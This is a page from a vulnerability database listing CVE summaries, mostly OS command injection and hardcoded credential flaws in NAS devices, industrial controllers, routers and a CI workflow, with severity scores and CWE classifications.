CVSS Score-9.3||CRITICAL
EPSS-0.74% / 73.05%
||
7 Day CHG~0.00%
Published-15 May, 2025 | 08:48
Updated-15 May, 2025 | 14:00
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in I-O DATA network attached hard disk 'HDL-T Series' firmware Ver.1.21 and earlier when 'Remote Link3 function' is enabled. If exploited, a remote unauthenticated attacker may execute an arbitrary OS command.

Action-Not Available
Vendor-I-O DATA DEVICE, INC.
Product-HDL-T1WHHDL-T3WHHDL-T3NVHDL-T2WHHDL-T1NVHDL-T2NVHDL-TC500HDL-TC1
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2024-10919
Matching Score-4
Assigner-VulDB
ShareView Details
Matching Score-4
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-7.18% / 91.62%
||
7 Day CHG~0.00%
Published-06 Nov, 2024 | 16:00
Updated-08 Nov, 2024 | 21:07
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
didi Super-Jacoco triggerUnitCover os command injection

A vulnerability has been found in didi Super-Jacoco 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /cov/triggerUnitCover. The manipulation of the argument uuid leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-didididididi
Product-super-jacocoSuper-Jacocosuper_jacoco
CWE ID-CWE-74
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2020-36762
Matching Score-4
Assigner-VulDB
ShareView Details
Matching Score-4
Assigner-VulDB
CVSS Score-5.5||MEDIUM
EPSS-0.40% / 60.83%
||
7 Day CHG~0.00%
Published-18 Jul, 2023 | 15:00
Updated-04 Aug, 2024 | 17:37
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
ONS Digital RAS Collection Instrument comment.yml jobs os command injection

A vulnerability was found in ONS Digital RAS Collection Instrument up to 2.0.27 and classified as critical. Affected by this issue is the function jobs of the file .github/workflows/comment.yml. The manipulation of the argument $COMMENT_BODY leads to os command injection. Upgrading to version 2.0.28 is able to address this issue. The name of the patch is dcaad2540f7d50c512ff2e031d3778dd9337db2b. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-234248.

Action-Not Available
Vendor-onsONS Digital
Product-ras_collection_instrumentRAS Collection Instrument
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2025-3128
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) Industrial Control Systems (ICS)
ShareView Details
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) Industrial Control Systems (ICS)
CVSS Score-9.3||CRITICAL
EPSS-0.35% / 57.02%
||
7 Day CHG~0.00%
Published-21 Aug, 2025 | 19:37
Updated-22 Aug, 2025 | 18:08
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Mitsubishi Electric Europe smartRTU OS Command Injection

A remote unauthenticated attacker who has bypassed authentication could execute arbitrary OS commands to disclose, tamper with, destroy or delete information in Mitsubishi Electric smartRTU, or cause a denial-of service condition on the product.

Action-Not Available
Vendor-Mitsubishi Electric Europe
Product-smartRTU
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2022-30311
Matching Score-4
Assigner-CERT@VDE
ShareView Details
Matching Score-4
Assigner-CERT@VDE
CVSS Score-9.8||CRITICAL
EPSS-0.98% / 76.81%
||
7 Day CHG~0.00%
Published-13 Jun, 2022 | 13:45
Updated-17 Sep, 2024 | 00:15
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
FESTO: CECC-X-M1 and Servo Press Kit YJKP OS Command Injection vulnerability

In Festo Controller CECC-X-M1 product family in multiple versions, the http-endpoint "cecc-x-refresh-request" POST request doesn’t check for port syntax. This can result in unauthorized execution of system commands with root privileges due to improper access control command injection.

Action-Not Available
Vendor-festoFesto
Product-controller_cecc-x-m1-mv-s1controller_cecc-x-m1controller_cecc-x-m1-ys-l2_firmwareservo_press_kit_yjkp_firmwareservo_press_kit_yjkp-controller_cecc-x-m1-ys-l1_firmwareservo_press_kit_yjkpcontroller_cecc-x-m1-mv_firmwarecontroller_cecc-x-m1-y-yjkpcontroller_cecc-x-m1-ys-l2controller_cecc-x-m1-mvcontroller_cecc-x-m1_firmwareservo_press_kit_yjkp-_firmwarecontroller_cecc-x-m1-y-yjkp_firmwarecontroller_cecc-x-m1-ys-l1controller_cecc-x-m1-mv-s1_firmwareController CECC-X-M1-MV (4407605)Controller CECC-X-M1-Y-YJKP (4803891)Controller CECC-X-M1 (8124922)Controller CECC-X-M1-MV-S1 (4407606)Controller CECC-X-M1-YS-L1 (8082793)Controller CECC-X-M1-MV (8124923)Controller CECC-X-M1-MV-S1 (8124924)Controller CECC-X-M1-YS-L2 (8082794)Servo Press Kit YJKP (8077950)Servo Press Kit YJKP- (8058596)Controller CECC-X-M1 (4407603)
CWE ID-CWE-863
Incorrect Authorization
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2022-30318
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-3.39% / 87.46%
||
7 Day CHG~0.00%
Published-31 Aug, 2022 | 15:39
Updated-03 Aug, 2024 | 06:48
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

Honeywell ControlEdge through R151.1 uses Hard-coded Credentials. According to FSCT-2022-0056, there is a Honeywell ControlEdge hardcoded credentials issue. The affected components are characterized as: SSH. The potential impact is: Remote code execution, manipulate configuration, denial of service. The Honeywell ControlEdge PLC and RTU product line exposes an SSH service on port 22/TCP. Login as root to this service is permitted and credentials for the root user are hardcoded without automatically changing them upon first commissioning. The credentials for the SSH service are hardcoded in the firmware. The credentials grant an attacker access to a root shell on the PLC/RTU, allowing for remote code execution, configuration manipulation and denial of service.

Action-Not Available
Vendor-n/aHoneywell International Inc.
Product-controledge_plccontroledge_rtucontroledge_plc_firmwarecontroledge_rtu_firmwaren/a
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2022-31499
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-93.25% / 99.81%
||
7 Day CHG~0.00%
Published-25 Aug, 2022 | 22:09
Updated-03 Aug, 2024 | 07:19
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256.

Action-Not Available
Vendor-nortekcontroln/a
Product-emerge_e3_firmwareemerge_e3n/a
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2022-30105
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-4.28% / 88.89%
||
7 Day CHG~0.00%
Published-18 May, 2022 | 15:52
Updated-03 Aug, 2024 | 06:40
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

In Belkin N300 Firmware 1.00.08, the script located at /setting_hidden.asp, which is accessible before and after configuring the device, exhibits multiple remote command injection vulnerabilities. The following parameters in the [form name] form; [list vulnerable parameters], are not properly sanitized after being submitted to the web interface in a POST request. With specially crafted parameters, it is possible to inject a an OS command which will be executed with root privileges, as the web interface, and all processes on the device, run as root.

Action-Not Available
Vendor-n/aBelkin International, Inc.
Product-n300n300_firmwaren/a
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2022-30271
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-0.20% / 41.69%
||
7 Day CHG~0.00%
Published-26 Jul, 2022 | 22:11
Updated-03 Aug, 2024 | 06:48
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

The Motorola ACE1000 RTU through 2022-05-02 ships with a hardcoded SSH private key and initialization scripts (such as /etc/init.d/sshd_service) only generate a new key if no private-key file exists. Thus, this hardcoded key is likely to be used by default.

Action-Not Available
Vendor-n/aMotorola Mobility LLC. (Lenovo Group Limited)
Product-ace1000_firmwareace1000n/aace1000_firmware
CWE ID-CWE-259
Use of Hard-coded Password
CWE ID-CWE-798
Use of Hard-coded Credentials
  • Previous
  • 1
  • 2
  • 3
  • 4
  • ...
  • 41
  • 42
  • Next
Details not found